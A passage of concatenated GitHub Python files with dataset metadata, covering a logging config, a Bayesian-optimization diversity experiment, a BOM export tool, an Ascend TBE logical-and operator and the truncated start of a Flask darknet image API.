logging.Formatter(LOGGING_FORMAT)\n\nPATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'server_logs/server.log')\n\nSTREAM_HANDLER = logging.StreamHandler(sys.stderr)\nSTREAM_HANDLER.setFormatter(SERVER_FORMATTER)\nSTREAM_HANDLER.setLevel(logging.ERROR)\nLOG_FILE = logging.handlers.TimedRotatingFileHandler(PATH, encoding=ENCODING, interval=1, when='h')\nLOG_FILE.setFormatter(SERVER_FORMATTER)\n\nLOGGER = logging.getLogger('server')\nLOGGER.addHandler(STREAM_HANDLER)\nLOGGER.addHandler(LOG_FILE)\nLOGGER.setLevel(LOGGING_LEVEL)\n\n\nif __name__ == '__main__':\n LOGGER.critical(LOGGER_CRITICAL)\n LOGGER.error(LOGGER_ERROR)\n LOGGER.debug(LOGGER_DEBUG)\n LOGGER.info(LOGGER_INFO)\n","repo_name":"dimansidorov/async_python","sub_path":"logs/config_server_logs.py","file_name":"config_server_logs.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39439823746","text":"# ################\n# Experiment 3-2-3 - Effects of diversity on the optimization process when hyper-parameters are fixed to the optimal values for each function\n# Corresponding issue on git - #\n\n# Generates data for BO optimizing with fixed optimal parameters for wildcatwells with args {'N':1,'Smoothness':0.2,'rug_freq':1,'rug_amp':0.7} and seed in the range [0,numfuncs] and saves the figures generated to Experiment3-2-3 directory.\n\n# Needed arguments:\n# #Trials- Number of trials to generate the distribution of data\n# #Numfuncs-Number of functions to generate the data for i.e from seed 0 to numfuncs-1 seed.\n# #intent- choices -> {gen-data: To generate and save data to suitable directory, plot-data: To load data and plot data from the suitable directory}\n# ################\n\nimport sys\nsys.path.insert(1, '../src/optimizers')\nsys.path.insert(1, '../src')\n\nfrom objectives import objectives\n\nimport data_gen\nimport numpy as np\nimport random\nimport string\nimport pickle\nimport dill\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.colors import ListedColormap, BoundaryNorm\nfrom scipy.stats import kde\n\nfrom ipyparallel import Client\nimport ipyparallel as ipp\nimport os\nimport subprocess\nimport time\nimport itertools\nfrom tqdm import tqdm\nimport itertools\nimport pandas as pd\nimport results\nimport ray\nfrom os.path import exists\nif sys.platform.startswith('win'):\n os.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\ndef savefile(filename,variable):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'wb') as f:\n dill.dump(variable, f)\n return variable\n\ndef unique_file(basename, ext):\n actualname = \"%s.%s\" % (basename, ext)\n c = itertools.count()\n while os.path.exists(actualname):\n actualname = \"%s (%d).%s\" % (basename, next(c), ext)\n return actualname\n\ndef load_variable(filename):\n with open(filename, 'rb') as f:\n variable = dill.load(f)\n return variable\n\n@ray.remote(num_gpus=0.1,num_cpus=0.5)\ndef map_(opt,objective,trial,percentile):\n import os\n os.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n objective.seed=trial\n if objective.fun_name!='wildcatwells':\n wildcatwells=objective.generate_cont()\n else:\n wildcatwells=objective.generate_cont(from_saved=True,local_dir='C:\\\\temp\\\\wildcatwells')\n counter=0\n opt.datagenmodule.options['seed']=trial*7\n opt.datagenmodule.generate()\n while counter<5:\n try:\n opt.train=opt.datagenmodule.sample(percentile)\n result= opt.optimize(wildcatwells)\n result.seed=trial\n return result\n except KeyboardInterrupt:\n raise KeyboardInterrupt('Keyboard interrupt')\n except:\n counter+=1\n print('Error occured restarting.')\n\nimport math\nimport results\nfrom IPython.display import clear_output\n\n#need to add log arg\ndef main(trials,ind_trials,dim_mat,objective_func,reverse=False):\n \n #Set-up variables\n completedata={} \n percentilemat=[5,95]\n \n available_locs=[0]\n batch_size=5\n \n if objective_func=='wildcatwells':\n ruggedness_mat=['low','medium','high']\n else:\n ruggedness_mat=['None']\n \n while len(available_locs)>0:\n from os.path import exists\n available_locs=[]\n for dim in np.arange(*dim_mat):\n for level_of_ruggedness in ruggedness_mat:\n for seed in range(trials):\n filename='../Data/ExperimentA4/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n if exists(filename):\n print(dim,level_of_ruggedness,seed)\n pass\n else:\n available_locs.append((dim,level_of_ruggedness,seed))\n \n if not reverse:\n dim,level_of_ruggedness,seed=available_locs[0]\n else:\n dim,level_of_ruggedness,seed=available_locs[-1]\n\n# dim,level_of_ruggedness,seed=3.0,'None',4\n filename='../Data/ExperimentA2/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n hpseries=load_variable(filename)\n print('Working on Trial {} of {}, for dim= {}, rug ={}'.format(seed+1,trials,dim,level_of_ruggedness))\n hpseries.extract_hyperparam()\n \n# Create a result object for the trial data\n result=results.result_diversity_trial()\n result.percentiles=percentilemat \n \n filename='../Data/experimentA4/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n savefile(filename,result)\n \n print(\"Computing data for {} dimensions\".format(str(dim)))\n \n # Set-up the function generator\n synth_func=objectives()\n if objective_func=='wildcatwells':\n synth_func.bounds=[(0,100)]*int(dim)\n elif objective_func=='Rastrigin':\n synth_func.bounds=[(-5.12,5.12)]*int(dim)\n elif objective_func=='Rosenbrock':\n synth_func.bounds=[(-10,10)]*int(dim)\n else:\n synth_func.bounds=[(-10,10)]*int(dim)\n synth_func._dim=int(dim)\n synth_func.fun_name=objective_func\n synth_func.budget=50**int(dim)\n\n #Set-up the diversity training data generator\n synth_data=data_gen.diverse_data_generator()\n synth_data.options['bounds']=synth_func.bounds\n synth_data.options['N_samples']=1000\n synth_data.gamma=1e-4\n synth_data.options['seed']=seed*7\n if objective_func=='wildcatwells':\n if int(dim)==3:\n synth_data.training_size=40\n else:\n synth_data.training_size=10\n elif objective_func=='Sphere':\n if int(dim)==2:\n synth_data.training_size=8\n elif dim==3:\n synth_data.training_size=12\n elif dim==4:\n synth_data.training_size=38\n else:\n synth_data.training_size=75\n elif objective_func=='Rastrigin':\n if int(dim)==2:\n synth_data.training_size=5\n elif dim==3:\n synth_data.training_size=7\n elif dim==4:\n synth_data.training_size=30\n else:\n synth_data.training_size=60\n elif objective_func=='Rosenbrock':\n if int(dim)==2:\n synth_data.training_size=4\n elif dim==3:\n synth_data.training_size=5\n elif dim==4:\n synth_data.training_size=8\n else:\n synth_data.training_size=20\n \n print('Computation started for {} ruggedness'.format(level_of_ruggedness))\n\n #Vary the synthetic black-box function for the sensitivity analysis\n if level_of_ruggedness=='low':\n synth_func.args={'N':1,'Smoothness':0.8,'rug_freq':1,'rug_amp':0.2,'A':10}\n elif level_of_ruggedness=='medium':\n synth_func.args={'N':1,'Smoothness':0.4,'rug_freq':1,'rug_amp':0.4,'A':10}\n else:\n synth_func.args={'N':1,'Smoothness':0.2,'rug_freq':1,'rug_amp':0.8,'A':10}\n\n \n #For diversity trial we need to iterate over different percentiles of diversity.\n for percentile in percentilemat:\n print('{}th percentile of diversity being evaluated'.format(percentile))\n \n #Set-up the optimizer\n from Optimizers import optimizer\n BO=optimizer()\n if dim==2:\n BO.max_iter=100\n elif dim>=3:\n BO.max_iter=400\n \n BO.opt=\"BO-fixparam\"\n BO.optima=synth_func.optimal_y\n BO.paramset=hpseries.optdict\n BO.tol=0.1\n BO.minimize=synth_func.minstate\n BO.bounds=synth_func.bounds\n \n #Add appropriate training data to BO.\n BO.datagenmodule=synth_data\n \n #Run the parallel process/Trial\n ray.shutdown()\n time.sleep(10)\n ray.init(runtime_env={\"working_dir\": \"../src\"}, num_cpus=10,num_gpus=2,log_to_driver=False)\n from tqdm.autonotebook import tqdm\n \n init_trial=0\n with tqdm(total=ind_trials-init_trial) as pbar:\n for batch_num in range(init_trial//batch_size,ind_trials//batch_size):\n current_result=ray.get([map_.remote(BO,synth_func,trial_num,percentile) for trial_num in range(batch_num*batch_size,(batch_num+1)*batch_size)])\n [[result.addresult(percentile,ind_result) for ind_result in current_result if ind_result is not None]]\n pbar.update(batch_size)\n #Save Data to the Result trial object and append to an outer list collecting data for each seed in the trial.\n filename='../Data/experimentA4/'+objective_func+'/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n savefile(filename,result)\n return\n\nif __name__=='__main__':\n \n import argparse\n import asyncio\n import os\n from utils import bootstrap\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"--trials\", type=int, default=10,\n help=\"Number of seeds for each iteration of ruggedness and smoothness that need to be evaluated.\")\n 10,\n parser.add_argument(\"--ind_trials\", type=int, default=20, help=\"Number of evaluation for each each seed\")\n \n parser.add_argument(\"--fun_name\",choices={\"wildcatwells\", \"Sphere\",\"Rastrigin\",\"Rosenbrock\"},default=\"wildcatwells\")\n \n parser.add_argument(\"--dimension_mat\", default=\"2, 6, 1\" , type=lambda s: tuple(float(item) for item in s.split(',')),\n help=\"Define the range generator for smoothness with a delimited string seperated by commas of the form :- ''start,stop,step'' \")\n \n parser.add_argument(\"--intent\", choices={\"gen-data\",\"optimal_init_iter\" ,\"plot-data\",\"save_compile_data\"}, default=\"gen-data\")\n \n parser.add_argument(\"--grid_type\",choices={\"difference\",\"comparison\"},default=\"comparison\")\n \n args = parser.parse_args()\n\n\n success=False\n if args.intent=='gen-data' or args.intent=='both':\n main(args.trials,args.ind_trials,args.dimension_mat,args.fun_name)\n \n \n def plot_data(percentile,dim,level_of_ruggedness,seed,args):\n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n result.opt=100\n else:\n filename='../Data/experimentA4/'+level_of_ruggedness+'/'+str(dim)+'/None/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n if args.grid_type=='comparison':\n try:\n return result.bootstrap(percentile)\n except:\n print(dim,level_of_ruggedness,seed)\n raise Exception('Error')\n else:\n try:\n return result.difference_bootstrap_plotdata()\n except:\n print(dim,level_of_ruggedness,seed)\n raise Exception('Error')\n\n def get_all_seed_data(dim,level_of_ruggednss,grid_type,args):\n import ray\n @ray.remote\n def map_(obj, f):\n import sys\n sys.path.insert(1, '../src/optimizers')\n sys.path.insert(1, '../src')\n import results\n return f(*obj)\n ray.shutdown()\n ray.init()\n if grid_type=='comparison':\n return ray.get([map_.remote([5,dim,level_of_ruggedness,seed,args], plot_data) for seed in range(10)]),ray.get([map_.remote([95,dim,level_of_ruggedness,seed,args], plot_data) for seed in range(10)])\n elif grid_type=='difference':\n return ray.get([map_.remote(['None',dim,level_of_ruggedness,seed,args], plot_data) for seed in range(10)])\n \n \n if args.intent=='save_compile_data': \n completedata={}\n dim_mat=np.arange(*args.dimension_mat)\n if args.fun_name=='wildcatwells':\n ruggedness_mat=['low','medium','high']\n else:\n ruggedness_mat=['Sphere','Rosenbrock','Rastrigin']\n for dim in dim_mat:\n completedata[dim]={}\n for level_of_ruggedness in ruggedness_mat:\n completedata[dim][level_of_ruggedness]={}\n grids=['comparison','difference']\n for grid_type in grids:\n plotdata=get_all_seed_data(dim,level_of_ruggedness,grid_type,args)\n if grid_type=='comparison':\n completedata[dim][level_of_ruggedness][grid_type]=[bootstrap(single_percentile_data) for single_percentile_data in np.array(plotdata)[:,:,0,:]]\n else:\n completedata[dim][level_of_ruggedness][grid_type]=bootstrap(np.array(plotdata)[:,0,:])\n \n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells-plot-data.pkl'\n else:\n filename='../Data/experimentA4/test-plot-data.pkl'\n savefile(filename,completedata)\n \n if args.intent=='plot-data':\n \n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells-plot-data.pkl'\n else:\n filename='../Data/experimentA4/test-plot-data.pkl'\n \n if exists(filename):\n completedata=load_variable(filename)\n else:\n raise Exception('Save plot data using --intent \"save_compile_data\"')\n \n def average_cumoptgap(percentilemat,dim,level_of_ruggedness):\n import numpy as np\n cumoptgap_data=[]\n for seed in range(10):\n if args.fun_name=='wildcatwells':\n filename='../Data/experimentA4/wildcatwells/'+str(dim)+'/'+level_of_ruggedness+'/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n result.opt=100\n cumoptgap_data.append(result.percentage_imporvement_cum_opt_gap(percentilemat)[0])\n else:\n filename='../Data/experimentA4/'+level_of_ruggedness+'/'+str(dim)+'/None/data'+str(seed)+'.pkl'\n result=load_variable(filename)\n result.opt=0\n cumoptgap_data.append(result.percentage_imporvement_cum_opt_gap(percentilemat)[0])\n return np.average(cumoptgap_data)\n \n dim_mat=np.arange(*args.dimension_mat)\n if args.fun_name=='wildcatwells':\n ruggedness_mat=['low','medium','high']\n else:\n ruggedness_mat=['Sphere','Rosenbrock','Rastrigin']\n \n #Generate plot and save it to the appropriate directory.\n with plt.style.context(['science','no-latex']):\n fig, ax = plt.subplots(len(dim_mat), len(ruggedness_mat), sharex='row',figsize=(30,21))\n \n for i,dim in enumerate(dim_mat):\n for j,level_of_ruggedness in enumerate(ruggedness_mat):\n percentilemat=[5,95]\n cumoptgap=average_cumoptgap(percentilemat,dim,level_of_ruggedness)\n cumoptgaptext1='Diversity helped imrove'\n cumoptgaptext2='performance by '+ str(round(cumoptgap*100,2)) + ' percent'\n if not exists(filename):\n plotdata=get_all_seed_data(smoothness,rug_amp,args.grid_type)\n else:\n plotdata=completedata[dim][level_of_ruggedness]\n if args.grid_type==\"comparison\":\n #bootstraps the data for the line plot for each percentile in the diversity trial result object.\n for k,percentile in enumerate(percentilemat):\n if not exists(filename):\n bootstrap_on_trials=bootstrap(np.array(plotdata)[:,:,0,:][k])\n else:\n bootstrap_on_trials=plotdata[args.grid_type][k]\n label=str(percentile)+'th percentile'\n ax[i,j].plot(np.arange(args.max_iter+2), bootstrap_on_trials[0], '-',label=label) #Plotting the mean data\n ax[i,j].fill_between(np.arange(args.max_iter+2),bootstrap_on_trials[1], \n bootstrap_on_trials[2], alpha=0.3) #Plotting the 90% confidence intervals.\n ax[i,j].text(15,20, cumoptgaptext1,fontsize='15')\n ax[i,j].text(10,17, cumoptgaptext2,fontsize='15')\n \n ax[i,j].legend(fontsize='x-small')\n ax[i,j].set_ylim([0, 40])\n ax[i,j].set_xlim([0, int(args.max_iter/2)])\n \n else:\n if not exists(filename):\n bootstrap_on_trials=bootstrap(np.array(plotdata)[:,0,:])\n else:\n bootstrap_on_trials=plotdata[args.grid_type]\n def create_colormap_and_ls(x,y):\n # select how to color\n cmap = (mpl.colors.ListedColormap(['tomato','blue','yellowgreen']).with_extremes(over='yellowgreen', under='tomato'))\n bounds = [-1e-10,0.0,1e-10]\n norm = mpl.colors.BoundaryNorm(bounds, cmap.N)\n \n # get segments\n xy = np.array([x, y]).T.reshape(-1, 1, 2)\n segments = np.hstack([xy[:-1], xy[1:]])\n \n # make line collection\n lc = LineCollection(segments, cmap = cmap, norm = norm, linewidths=2)\n lc.set_array(y)\n return cmap,norm,lc\n \n cmap,norm,lc=create_colormap_and_ls(np.arange(len(bootstrap_on_trials[0])),bootstrap_on_trials[0])\n\n ax[i,j].add_collection(lc) #Plotting the mean data as a line segment\n\n ax[i,j].fill_between(np.arange(len(bootstrap_on_trials[0])),bootstrap_on_trials[1], \n bootstrap_on_trials[2], alpha=0.1, hatch='\\\\\\\\\\\\\\\\',facecolor='azure') \n ax[i,j].axhline(y=0,label='Insignificant difference in perfromance',color='blue')\n\n if cumoptgap<0: \n c='r'\n else:\n c='g'\n# ax[i,j].text(20,5, str(round(cumoptgap,2)) ,fontsize='50',color=c)\n handles, labels = ax[i,j].get_legend_handles_labels()\n if level_of_ruggedness!='Rosenbrock':\n ax[i,j].set_ylim([-20, 10])\n ax[i,j].text(20,3.5, str(round(cumoptgap,2)) ,fontsize='50',color=c)\n else:\n ax[i,j].set_ylim([-20000, 10000])\n ax[i,j].text(20,3500.5, str(round(cumoptgap,2)) ,fontsize='50',color=c)\n ax[i,j].tick_params(axis='x', labelsize=25)\n ax[i,j].tick_params(axis='y', labelsize=25)\n \n if dim==2:\n ax[i,j].set_xlim([0, int(len(bootstrap_on_trials[0]))/2])\n else:\n ax[i,j].set_xlim([0, 100])\n if j==0:\n y_label=dim\n ax[i,j].set_ylabel(str(round(y_label,2)),fontsize='30')\n if i==len(dim_mat)-1:\n x_label=level_of_ruggedness\n ax[i,j].set_xlabel(x_label,fontsize='30')\n \n if args.grid_type!=\"comparison\":\n right,bottom,width,height=0.83,0.1,0.03,0.8\n cbar_ax = fig.add_axes([right,bottom,width,height])\n cbar=fig.colorbar(\n mpl.cm.ScalarMappable(cmap=cmap, norm=norm), extend='both',\n extendfrac='auto',ax=ax.ravel().tolist(),cax=cbar_ax)\n cbar.set_label( label='Effect of diversity on performance of optimizer',fontsize='30')\n cbar.set_ticks([])\n ax[int(len(dim_mat)/2)-1,0].text(-38,-60 , \"Number of Dimensions\",fontsize='45',rotation=90)\n if args.fun_name=='wildcatwells':\n ax[len(dim_mat)-1,int(len(ruggedness_mat)/2)].text(0,-17 ,\"Level of Ruggedness\",fontsize='45')\n else:\n ax[len(dim_mat)-1,int(len(ruggedness_mat)/2)].text(20,-33500 ,\"Test functions\",fontsize='45')\n \n plt.subplots_adjust(\n left = 0.1, # the left side of the subplots of the figure\n right = 0.8, # the right side of the subplots of the figure\n bottom = 0.1, # the bottom of the subplots of the figure\n top = 0.9, # the top of the subplots of the figure\n wspace = 0.2, # the amount of width reserved for blank space between subplots\n hspace = 0.2) # the amount of height reserved for white space between subplots\n\n if args.grid_type==\"comparison\":\n fig.suptitle('Comparison in optimality gap when hyperparameters are fixed for the optimizer',fontsize='48', x=0.4, horizontalalignment='center')\n filename,ext= '../results/ExperimentA4/comparison-plot','.png'\n else:\n fig.suptitle('Absolute difference in optimality gap (y-axis) vs iterations (x-axis) \\n when hyperparameters are fixed',fontsize='48', x=0.45, horizontalalignment='center')\n filename,ext= '../results/ExperimentA4/difference-plot','.png'\n\n try:\n savename=unique_file(filename, ext)\n plt.savefig(os.path.abspath(savename),bbox_inches = 'tight')\n plt.close()\n except:\n savename=unique_file(filename, ext)\n os.makedirs(os.path.dirname(savename), exist_ok=True)\n plt.savefig(os.path.abspath(savename),bbox_inches = 'tight')\n ","repo_name":"IDEALLab/JMD-Diversity-in-Bayesian-Optimization","sub_path":"Scripts/ExperimentA4.py","file_name":"ExperimentA4.py","file_ext":"py","file_size_in_byte":22600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9770702714","text":"from bom.program import encompix\nfrom bom.program import data\n\n# from bom.program import meridian\n\nimport pandas as pd\nimport csv\n\n\ndef main(command, assembly, close_file='never', open_model=True,\n recursive=True, output_report=True, output_import=True,\n update_parent_revision=True, update_vendor_id=True):\n \"\"\"Export the BOM from Inventor, Promise or from Cooperation\n\n The current workflow are:\n 1) Inventor/Promise/Cooperation - Create bom, ibom & ebom dataframes\n 2) Meridian - Update drawing revision column\n 3) Encompix - Update parent revision column\n 4) Encompix - Exclude sections with the same revision\n 5) Encompix - Update vendor id column\n 6) Python Core - Save report and import file\n\n Parameters\n ----------\n command : str\n Choose between 'mechanical', 'electrical' or 'cooperation\n sub-command. Extract the bom from the respective program.\n assembly : str\n The assembly number you wish to import eg AGR1338-025-00.\n If None, use the active drawing opened in Inventor instead.\n close_file : str\n Choose whether to close idw or/and iam file when finished\n (without saving). Choose between ['never', 'iam', 'idw', 'both']\n open_model : bool\n Sometime there are missing description on the parts list. To fix\n this, the assembly model needs to be opened as well.\n update_parent_revision : bool\n update assembly revision on the ebom\n recursive : bool\n Include sub assembly BOMs.\n output_report : bool\n Save Report file (partcode.xlsx)\n output_import : bool\n Save Encompix import file (partcode.csv)\n \"\"\"\n\n # 1a) Mechanical BOMs\n if command == 'mechanical':\n app = data.Inventor(\n assembly=assembly,\n close_file=close_file,\n open_model=open_model,\n recursive=recursive\n )\n bom = app.load_bom()\n ibom = app.create_indented_bom(bom)\n ebom = app.create_ebom(bom)\n\n # -------------------------------------------------------------------------\n # TODO - 1b) Electrical BOMs\n # if command == 'electrical':\n # app = data.Promise()\n # bom = app.load_bom()\n # ibom = app.create_indented_bom(bom)\n # ebom = app.create_ebom(bom)\n #\n # TODO - 1c) Cooperation BOMs\n # if command == 'cooperation':\n # app = data.Cooperation()\n # bom = app.load_bom()\n # ibom = app.create_indented_bom(bom)\n # ebom = app.create_ebom(bom)\n #\n # TODO - 2) Meridian - Update drawing revision column\n # if command != 'electrical' and arg.update_drawing:\n # drev = meridian.load_drawing_revision(ebom)\n # ebom = meridian.update_drawing_revision(ebom, drev)\n # -------------------------------------------------------------------------\n\n # 3) Encompix - Update parent revision column\n if update_parent_revision:\n prev = encompix.load_parent_revision(ebom)\n ebom = encompix.update_parent_revision(ebom, prev)\n\n # -------------------------------------------------------------------------\n # TODO - 4) Encompix - Exclude sections with the same revision\n # if arg.exclude_same_revision:\n # ebom = app.encompix.exlude_same_revision(ebom)\n # -------------------------------------------------------------------------\n\n # 5) Encompix - Update vendor id column\n if update_vendor_id:\n vendor = encompix.load_vendor_id()\n ebom = encompix.update_vendor_id(ebom, vendor)\n\n # 6a) Save report file\n if output_report:\n save_report_file(assembly, bom, ibom, ebom, prev)\n\n # 6b) Save Encompix Import csv\n if output_import:\n save_import_file(assembly, ebom)\n\n # -------------------------------------------------------------------------\n # TODO - 6c) Save Encompix Item csv\n # if arg.output_item:\n # save_item_file()\n # -------------------------------------------------------------------------\n\n\ndef save_report_file(assembly, bom, indented_bom, ebom, prev):\n \"\"\"Save Report file as partcode.xlsx\n\n Parameters\n ----------\n assembly : str\n assembly number\n bom : obj\n bom dataframe\n indented_bom : obj\n indented bom dataframe\n ebom : obj\n encompix import bom dataframe\n \"\"\"\n writer = pd.ExcelWriter(assembly + '.xlsx', engine='xlsxwriter')\n workbook = writer.book\n header_format = workbook.add_format({\n 'bold': True,\n 'text_wrap': False,\n 'fg_color': '#DCE6F1',\n 'border': 1\n })\n\n _create_bom_worksheet(bom, writer, header_format)\n _create_indented_bom_worksheet(indented_bom, writer, header_format)\n _create_import_file_worksheet(ebom, writer, header_format)\n _create_new_revision_worksheet(prev, writer, header_format)\n\n writer.close()\n\n\ndef _create_bom_worksheet(df, writer, header_format):\n \"\"\"Create and format bom worksheet\n\n Parameters\n ----------\n df : obj\n bom dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='bom',\n index=False,\n header=False,\n startrow=1\n )\n\n worksheet = writer.sheets['bom']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n worksheet.set_column(0, 0, 16) # Assembly\n worksheet.set_column(1, 1, 26) # Assembly_Name\n worksheet.set_column(5, 5, 16) # Dwg_No\n worksheet.set_column(6, 6, 34) # Component\n\n\ndef _create_indented_bom_worksheet(df, writer, header_format):\n \"\"\"Create and format indented bom worksheet\n\n Parameters\n ----------\n df : obj\n ibom dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='indented_bom',\n index=False,\n header=False,\n startrow=1,\n )\n\n worksheet = writer.sheets['indented_bom']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n worksheet.set_column(2, 2, 21) # Dwg_No\n worksheet.set_column(3, 3, 60) # Component\n\n\ndef _create_new_revision_worksheet(df, writer, header_format):\n \"\"\"Create and encompix new revision worksheet\n\n Parameters\n ----------\n df : obj\n prev dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='new_revision',\n index=False,\n startrow=1,\n header=False\n )\n\n worksheet = writer.sheets['new_revision']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n worksheet.set_column(0, 0, 16) # Assembly\n worksheet.set_column(1, 1, 26) # Assembly_Name\n worksheet.set_column(2, 1, 15) # Revision\n\n\ndef _create_import_file_worksheet(df, writer, header_format):\n \"\"\"Create and format encompix import bom worksheet\n\n Parameters\n ----------\n df : obj\n ebom dataframe\n writer : obj\n xlsxwriter object\n header_format : dict\n 1st row header format properties\n \"\"\"\n df.to_excel(\n writer,\n sheet_name='import',\n index=False,\n startrow=1,\n header=False\n )\n\n worksheet = writer.sheets['import']\n for col_num, value in enumerate(df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\n # worksheet.set_column(0, 0, 16) # Assembly\n # worksheet.set_column(1, 1, 26) # Assembly_Name\n\n\ndef save_import_file(assembly, ebom):\n \"\"\"Save Encompix import file as partcode.csv\n\n Parameters\n ----------\n assembly : str\n assembly number\n ebom : obj\n encompix import bom dataframe\n \"\"\"\n ebom.to_csv(\n assembly + '.csv',\n index=False,\n quoting=csv.QUOTE_NONNUMERIC\n )\n","repo_name":"toptea/ebom","sub_path":"src/bom/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8643929026","text":"import te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import refine_shapes_for_broadcast\nfrom te.utils.op_utils import *\n\n# pylint: disable=locally-disabled,too-many-arguments,unused-argument\n# pylint: disable=too-many-locals,invalid-name\n@fusion_manager.register(\"logical_and\")\ndef logical_and_compute(x1, x2, y, kernel_name=\"logical_and\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n x1 : TVM tensor\n the placeholder of x1\n x2: TVM tensor\n the placeholder of x2\n y : dict\n dict of output_y, include keys(shape and dtype)\n kernel_name : str\n kernel name, default value is \"logical_and\"\n\n Returns\n -------\n output tensor\n \"\"\"\n shape_x = te.lang.cce.util.shape_to_list(x1.shape)\n shape_y = te.lang.cce.util.shape_to_list(x2.shape)\n _, _, shape_max = broadcast_shapes(shape_x, shape_y, param_name_input1=\"x1\", param_name_input2=\"x2\")\n\n x1 = te.lang.cce.cast_to(x1, \"float16\")\n x2 = te.lang.cce.cast_to(x2, \"float16\")\n\n data_x = te.lang.cce.broadcast(x1, shape_max)\n data_y = te.lang.cce.broadcast(x2, shape_max)\n\n res = te.lang.cce.vmul(data_x, data_y)\n\n res = te.lang.cce.cast_to(res, \"int8\", True)\n\n return res\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_INPUT, REQUIRED_OUTPUT, KERNEL_NAME)\ndef logical_and(x1, x2, y, kernel_name=\"logical_and\"):\n \"\"\"\n calculating data\n\n Parameters\n ----------\n x1 : dict\n shape and dtype of input, only support float16, float32\n x2 : dict\n shape and dtype of input, only support float16, float32\n y : dict\n shape and dtype of output, should be same shape and type as input\n kernel_name : str\n kernel name, default value is \"logical_and\"\n\n Returns\n -------\n None\n \"\"\"\n shape_x = x1.get(\"shape\")\n shape_y = x2.get(\"shape\")\n dtype_x = x1.get(\"dtype\")\n dtype_y = x2.get(\"dtype\")\n\n check_shape(shape_x, param_name=\"x1\")\n check_shape(shape_y, param_name=\"x2\")\n\n if dtype_x != dtype_y:\n raise RuntimeError(\"The type of input must be the same\")\n\n input_data_type = dtype_x.lower()\n check_tuple = (\"int8\",)\n check_dtype(input_data_type, check_tuple, param_name=\"x1\")\n\n shape_x, shape_y, _ = broadcast_shapes(shape_x, shape_y, param_name_input1=\"x1\", param_name_input2=\"x2\")\n shape_x, shape_y = refine_shapes_for_broadcast(shape_x, shape_y)\n data_x = tvm.placeholder(shape_x, dtype=dtype_x, name=\"data_x\")\n data_y = tvm.placeholder(shape_y, dtype=dtype_y, name=\"data_y\")\n\n res = logical_and_compute(data_x, data_y, y, kernel_name)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n config = {\"name\": kernel_name,\n \"tensor_list\": (data_x, data_y, res)}\n\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/logical_and.py","file_name":"logical_and.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11877669378","text":"\nfrom flask import Blueprint\nfrom flask import jsonify\nfrom flask import request\n\nfrom rest_darknet import load_image_color\nfrom rest_darknet.pydarknet.image import Image, NotAllowedFileException\n\nmodule = Blueprint('api', __name__, url_prefix='/api/v1')\n\nfrom rest_darknet.views.response import *\nfrom rest_darknet.pydarknet.classifier import Classifier\n\nfrom rest_darknet_config import UPLOAD_FOLDER\n\n\n@module.route('/upload_image', methods=['POST'])\ndef upload_image():\n # check if the post request has the file part\n if 'image' not in request.files:\n return jsonify(NO_IMAGE_FOUND.body), NO_IMAGE_FOUND.status_code\n\n file = request.files['image']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n return jsonify(NO_SELECTED_IMAGE.body), NO_SELECTED_IMAGE.status_code\n if file:\n try:\n img = Image(file)\n except NotAllowedFileException:\n return jsonify(NOT_ALLOWED_FILE.body), NOT_ALLOWED_FILE.status_code\n try:\n filename = img.save_file()\n except FileNotFoundError:\n return jsonify(INTERNAL_SERVER_ERROR.body), INTERNAL_SERVER_ERROR.status_code\n response = SuccessResponse({\"filename\": filename}, \"OK\")\n return jsonify(response.body), response.status_code\n\n\n\n@module.route('/classify', methods=['GET'])\ndef image_classify():\n _limit = 10\n clf = Classifier()\n img_url = request.args.get('img')\n image_instance = load_image_color(UPLOAD_FOLDER + '/{}'.format(img_url))\n if 